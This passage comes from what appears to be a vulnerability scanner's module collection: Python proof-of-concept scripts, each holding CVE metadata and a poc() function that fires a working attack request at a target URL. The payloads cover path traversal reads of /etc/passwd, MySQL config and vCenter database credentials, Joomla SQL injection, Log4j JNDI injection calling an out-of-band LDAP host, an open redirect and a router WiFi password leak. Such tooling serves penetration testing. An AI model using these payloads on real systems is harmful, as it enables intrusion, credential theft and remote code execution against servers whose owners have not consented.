resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2018/CVE-2018-18778.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''mini_httpd Path Traversal''', 9 | "description": '''ACME mini_httpd before 1.30 lets remote users read arbitrary files.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2018-18778", 18 | "cwe-id": "CWE-200" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2018", "lfi"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/etc/passwd""" 39 | method = "GET" 40 | data = """""" 41 | headers = {} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and (re.search(r"""root:.*:0:0:""",resp0.text)): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2022/CVE-2022-25323.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ZEROF Web Server 2.0 Cross-Site Scripting''', 9 | "description": '''ZEROF Web Server 2.0 allows /admin.back cross-site scripting.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2022-25323" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 17 | "cvss-score": "6.1", 18 | "cve-id": "CVE-2022-25323", 19 | "cwe-id": "CWE-79" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["xss", "cve", "cve2022", "zerof"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/admin.back' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 401 and "back" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/apache/apache-ofbiz-log4j-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Apache OFBiz Log4j JNDI RCE''', 11 | "description": '''''', 12 | "severity": "critical", 13 | "references": [ 14 | "" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["ofbiz", "oast", "log4j", "rce", "apache", "jndi"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | oob_domain,flag = gen_oob_domain() 41 | 42 | path = """/webtools/control/main""" 43 | method = "GET" 44 | data = """""" 45 | headers = {'Cookie': 'OFBiz.Visitor=${jndi:ldap://${hostName}.%s}' % oob_domain} 46 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 47 | 48 | if verify_request(type="dns", flag=flag): 49 | result["success"] = True 50 | result["info"] = info() 51 | result["payload"] = url+path 52 | 53 | except: 54 | result["success"] = False 55 | 56 | return result 57 | 58 | 59 | # Exploit, can be same with poc() 60 | def exp(url): 61 | return poc(url) 62 | 63 | 64 | # Utils 65 | def format_url(url): 66 | url = url.strip() 67 | if not ( url.startswith('http://') or url.startswith('https://') ): 68 | url = 'http://' + url 69 | url = url.rstrip('/') 70 | 71 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/openvpn-hhi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''OpenVPN Host Header Injection''', 9 | "description": '''A vulnerability in OpenVPN Access Server allows remote attackers to inject arbitrary redirection URLs by using the 'Host' HTTP header field.''', 10 | "severity": "info", 11 | "references": [ 12 | "" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["openvpn", "hostheader-injection"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/""" 39 | method = "GET" 40 | data = """""" 41 | headers = {} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""//{{randstr}}.tld/__session_start__/""" in str(resp0.headers) and """openvpn_sess""" in str(resp0.headers)) and (resp0.status_code == 302): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/vmware/vmware-vcenter-lfi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''VMware vCenter Unauthenticated Arbitrary File Read''', 9 | "description": '''''', 10 | "severity": "high", 11 | "references": [ 12 | "https://kb.vmware.com/s/article/7960893", 13 | "https://twitter.com/ptswarm/status/1316016337550938122" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["vmware", "lfi", "vcenter"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/eam/vib?id={{path}}\\vcdb.properties""" 40 | method = "GET" 41 | data = """""" 42 | headers = {} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if (re.search(r"""(?m)^(driver|dbtype|password(\.encrypted)?)\s=""",resp0.text)) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/oa-tongda-path-traversal.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''OA TongDa Path Traversal''', 9 | "description": '''''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://github.com/jas502n/OA-tongda-RCE" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["tongda", "lfi"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/ispirit/interface/gateway.php""" 39 | method = "POST" 40 | data = """json={"url":"/general/../../mysql5/my.ini"}""" 41 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""text/html""" in str(resp0.headers)) and ("""[mysql]""" in resp0.text and """password=""" in resp0.text) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-1000012.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)''', 9 | "description": '''Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin''', 10 | "severity": "high", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985", 13 | "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "7.5", 18 | "cve-id": "CVE-2015-1000012", 19 | "cwe-id": "CWE-200" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/processmaker-lfi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ProcessMaker <= 3.5.4 Directory Traversal''', 9 | "description": '''A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/50229", 13 | "https://www.processmaker.com" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["processmaker", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/../../../..//etc/passwd""" 40 | method = "GET" 41 | data = """""" 42 | headers = {} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-7297.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Joomla Core SQL Injection''', 9 | "description": '''A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2015-7297", 13 | "http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2015-7297", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "joomla", "sqli"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if "cf79ae6addba60ad018347359bd144d2" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-7780.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ManageEngine Firewall Analyzer 8.0 - Directory Traversal''', 9 | "description": '''Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/35933", 13 | "https://www.cvedetails.com/cve/CVE-2015-7780/" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "6.5", 18 | "cve-id": "CVE-2015-7780", 19 | "cwe-id": "CWE-22" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "lfi", "manageengine"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/fw/mindex.do?url=./WEB-INF/web.xml%3f' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "java.sun.com" in resp.text and "application/xml" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-5688.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Geddy before v13.0.8 LFI''', 9 | "description": '''Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nodesecurity.io/advisories/geddy-directory-traversal", 13 | "https://github.com/geddy/geddy/issues/697" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "geddy", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-7823.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | 5 | # Vuln Base Info 6 | def info(): 7 | return { 8 | "author": "cckuailong", 9 | "name": '''Kentico CMS 8.2 Open Redirection''', 10 | "description": '''The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability''', 11 | "severity": "low", 12 | "references": [ 13 | "https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2015-7823" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2015", "kentico", "redirect"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/CMSPages/GetDocLink.ashx?link=https://example.com/' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and re.search(r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$', str(resp.headers)): 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/jamf/jamf-log4j-jndi-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''JAMF Log4j JNDI RCE''', 11 | "description": '''''', 12 | "severity": "critical", 13 | "references": [ 14 | "https://github.com/random-robbie/jamf-log4j" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["rce", "jndi", "log4j", "jamf"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | oob_domain,flag = gen_oob_domain() 41 | 42 | path = """/""" 43 | method = "POST" 44 | data = """username=${jndi:ldap://${hostName}.%s/test}&password=""" % oob_domain 45 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 46 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 47 | 48 | if verify_request(type="dns", flag=flag): 49 | result["success"] = True 50 | result["info"] = info() 51 | result["payload"] = url+path 52 | 53 | except: 54 | result["success"] = False 55 | 56 | return result 57 | 58 | 59 | # Exploit, can be same with poc() 60 | def exp(url): 61 | return poc(url) 62 | 63 | 64 | # Utils 65 | def format_url(url): 66 | url = url.strip() 67 | if not ( url.startswith('http://') or url.startswith('https://') ): 68 | url = 'http://' + url 69 | url = url.rstrip('/') 70 | 71 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/netis-info-leak.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak''', 9 | "description": '''A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/48384" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["netis", "exposure"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """//netcore_get.cgi""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Cookie': 'homeFirstShow=yes'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and ("""rp_ap_password""" in resp0.text and """rp_ap_ssid""" in resp0.text): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-4940.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin Tera Charts - Directory Traversal''', 9 | "description": '''Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-4940" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2014-4940", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2014", "wordpress", "wp-plugin", "lfi"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "root:" in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2022/CVE-2022-0281.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Microweber Information Disclosure''', 9 | "description": '''Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2022-0281" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 16 | "cvss-score": "7.5", 17 | "cve-id": "CVE-2022-0281", 18 | "cwe-id": "CWE-200" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | "shodan-query":'''http.favicon.hash:780351152''' 23 | }, 24 | "tags": ["cve", "cve2022", "microweber", "disclosure"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/api/users/search_authors' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and '"username":' in resp.text and '"email":' in resp.text and '"display_name":' in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-2962.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Belkin N150 Router 1.00.08/1.00.09 - Path Traversal''', 9 | "description": '''A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.kb.cert.org/vuls/id/774788", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-2962l" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2014-2962", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "lfi", "router", "firmware", "traversal"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = 